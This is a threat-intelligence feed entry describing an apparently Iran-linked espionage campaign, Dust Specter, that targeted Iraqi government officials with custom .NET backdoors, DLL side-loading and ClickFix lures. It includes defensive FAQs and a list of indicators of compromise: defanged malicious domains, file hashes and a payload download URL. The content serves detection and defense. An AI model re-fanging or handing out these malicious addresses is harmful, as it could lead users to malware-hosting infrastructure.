Threats Feed|Dust Specter|Last Updated 05/03/2026|AuthorCertfa Radar|Publish Date02/03/2026

Dust Specter: Iran-Nexus APT Targets Iraqi Government via Custom .NET Malware

  • Actor Motivations: Espionage,Exfiltration
  • Attack Vectors: Backdoor,Dropper,RAT,Pretexting
  • Attack Complexity: Medium
  • Threat Risk: Low Impact/Low Probability

Threat Overview

In January 2026, the Iran-nexus threat actor Dust Specter launched a targeted cyber espionage campaign against Iraqi government officials, specifically impersonating the Ministry of Foreign Affairs. Utilizing compromised government infrastructure, the group deployed undocumented .NET-based malware, including the SPLITDROP dropper and the TWINTASK/TWINTALK backdoors. The operation is characterized by sophisticated DLL side-loading techniques using legitimate binaries like VLC and WingetUI. A secondary attack chain features GHOSTFORM, a consolidated RAT that employs invisible Windows forms for delayed execution and in-memory PowerShell scripts to minimize its forensic footprint. Evidence suggests the actors leveraged generative AI to streamline code development and implemented "ClickFix" social engineering tactics to compromise targets.

Reference and Credit: Zscaler - March 2026

Dust Specter APT Targets Government Officials in Iraq

Detected Targets

TypeDescriptionConfidence
SectorGovernment Agencies and Services
Verified
RegionIraq
Verified

Extracted IOCs

  • afterworld[.]store
  • ca[.]iq
  • girlsbags[.]shop
  • lecturegenieltd[.]pro
  • meetingapp[.]site
  • onlinepettools[.]shop
  • web14[.]info
  • web27[.]info
  • 19ab3fd2800f62a47bf13a4cc4e4c124
  • 63702bd6422ec2d5678d4487146ea434
  • 70a9b537b9b7e1b410576d798e6c5043
  • 78275f3fc7e209b85bff6a6f99acc68a
  • 7f17fa22feaced1a16d4d39c545cdb16
  • 809139c237c4062baecab43570060d67
  • 8f44262afaa171b78fc9be20a0fb0071
  • a7561eb023bb2c4025defcfe758d8ac2
  • aa887d32eb9467abba263920e55d6abe
  • b19add5ccaa17a1308993e6f3f786b06
  • b8254efd859f5420f1ce4060e4796c08
  • d5ddf40ba2506c57d3087d032d733e08
  • 1debc4c512ded889464e386739d5d2f61b87ff13
  • 369b56a89b2fce2cbdc36f5a23bdec6067242911
  • 51a746c85bd486f223130173b7e674379a51b694
  • 682c043443cb81b6c2fde8c5df43333f5d1fec53
  • 8621be9e1aa730d1ac8eb06fa8f66d9da70ff293
  • 8735ee29c409b8d101eb3170f011455be41b7a91
  • ad97e1bba1d040a237727afdb2787d6867d72b74
  • c79c261457def606c3393dde77c82832a5c0ded3
  • c7dff3a0675f330feb9a7c469f8340369451d122
  • cb1760c90fb6c399e0125c7aa793efe37c4ce533
  • df04e36c106691f9fe88e5798e4ae86438bd4f1d
  • fc08f8403849c6233978a363f4cdc58cd7041823
  • 293ee1fe8d36aa79cf1f64f5ddef402bc6939d229c6fca955c7b796119564779
  • 3a66ae5942f6feb79cf81ee70451f761253e0e0bde95f0840abdd42a804fad39
  • 69294ad90aeb7f05e501e7191c95beb14e23da5587dd75557c867e2944a57fdc
  • 6af71297ce7681e64d9a4c5449a7326f17f3f107cb7940ec5e0840390c457a47
  • 6bb0d45799076b3f2d7f602b978a0779868fc72a1188374f6919fbbfba23efce
  • 797325b3c8a9356dcace75d93cb5cfb7847d2049c66772d4cc2cee821618cb96
  • 903f7869a94d88d43b9140bb656f7bb86ef725efc78ef2ff9d12fd7c7c2aca74
  • a27d53608ab05b5c7cb86bcf4a273435238beeb7e7efd7845375b2aa765f51e2
  • ad26cd72a83b884a8bc5aaa87309683953e151ebb3fde42eda7bf9a4406e530d
  • eb5b7275c41de8e98d72696eeac9cba3719f334f8e7974e6b8760ece820b1d0c
  • f3f2dc31f70a105db161a5e7b463b2215d3cbd64ac0146fd68e39da1c279f7ef
  • fa51aff99d86a9f1f65aa0ebbf6ca40411d343cea59370851ab328b97e2164bb
  • hxxps://ca[.]iq/packages/mofasurvey_20_30_oct.zip
download

Tip: 45 related IOCs (0 IP, 8 domain, 1 URL, 0 email, 36 file hash) to this threat have been found.

FAQs

Targeting Iraqi Government Officials

A cybersecurity campaign was uncovered where attackers compromised legitimate government websites to distribute new, custom-built malicious software. The attackers used deceptive surveys and fake meeting invitations to trick targets into installing hidden backdoor programs onto their computers.

The attack is attributed with moderate to high confidence to a group tracked as Dust Specter. This group is believed to be an Iran-nexus threat actor and shares similar techniques, tools, and targets with historically known Iran-linked groups like APT34.

The campaign was an espionage operation designed to install persistent, lightweight backdoor programs and Remote Access Trojans (RATs) onto victim machines. The goal was to establish covert communication channels allowing the attackers to execute arbitrary commands, upload files, and download sensitive data.

This was not a widespread attack on the general public; it was highly concentrated. The operation specifically focused on the government sector in Iraq.

Yes, the campaign directly targeted Iraqi government officials. The attackers heavily relied on customized social engineering lures that masqueraded as official communications and surveys from Iraq’s Ministry of Foreign Affairs.

Attackers sent targets password-protected files or fake "Webex" meeting links. Once a victim interacted with these lures, the malware used artificial intelligence-assisted code to secretly install itself, hiding behind recognized, legitimate programs like media players to evade antivirus software and silently communicate with the attackers.

Government officials, particularly those in a Ministry of Foreign Affairs, possess highly sensitive diplomatic communications, state secrets, and policy data. This makes them prime, high-value targets for state-sponsored cyber espionage groups gathering intelligence.

Individuals should remain highly skeptical of unexpected password-protected files and be wary of prompts that ask them to copy and paste computer commands to fix a video or join a meeting (known as ClickFix attacks). Organizations should improve monitoring for programs running from unusual folders and regularly audit their web servers to ensure they haven't been compromised.

This is a strictly targeted issue. The threat actors focused their customized lures, specific infrastructure, and tailored malware exclusively on individuals working within or adjacent to the Iraqi government.

About Affiliation
Dust Specter
View Dust Specter's Insights